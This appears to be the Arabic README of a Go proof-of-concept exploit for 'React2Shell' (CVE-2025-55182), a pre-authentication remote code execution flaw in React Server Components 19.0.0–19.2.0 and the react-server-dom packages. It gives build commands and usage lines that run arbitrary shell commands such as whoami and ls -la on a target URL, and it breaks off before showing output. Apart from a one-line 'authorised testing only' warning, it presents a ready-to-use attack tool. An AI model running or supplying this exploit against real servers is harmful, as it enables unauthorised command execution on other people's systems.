
كود استغلال لثغرة React2Shell RCE (CVE-2025-55182) التي تؤثر على React Server Components 19.0.0-19.2.0. تستغل إلغاء التسلسل غير الآمن لتنفيذ أوامر عن بعد دون مصادقة.
إثبات المفهوم (PoC) لثغرة تنفيذ التعليمات البرمجية عن بُعد في مكونات خادم React (RSC) / Next.js.
توجد ثغرة تنفيذ تعليمات برمجية عن بُعد قبل المصادقة في إصدارات مكونات خادم React 19.0.0 و19.1.0 و19.1.1 و19.2.0 بما في ذلك الحزم التالية: react-server-dom-parcel وreact-server-dom-turbopack وreact-server-dom-webpack. يقوم الكود المُعرض للخطر بإلغاء تسلسل الحمولات من طلبات HTTP إلى نقاط نهاية وظائف الخادم بشكل غير آمن.
⚠️ تحذير: هذه الأداة مخصصة لاختبارات الأمن المصرح بها فقط.
go build -o exploit exploit.go
أو تشغيل مباشرة:
go run exploit.go
./exploit -u <URL> -c <command>
-u - عنوان URL الهدف (مطلوب)-c - الأمر المراد تنفيذه (الافتراضي: id)# Basic usage
./exploit -u https://vulnerable -c "whoami"
# Execute different command
./exploit -u https://vulnerable -c "ls -la"
# Run directly with go
go run exploit.go -u https://vulnerable -c "pwd"

تقوم الأداة بإخراج: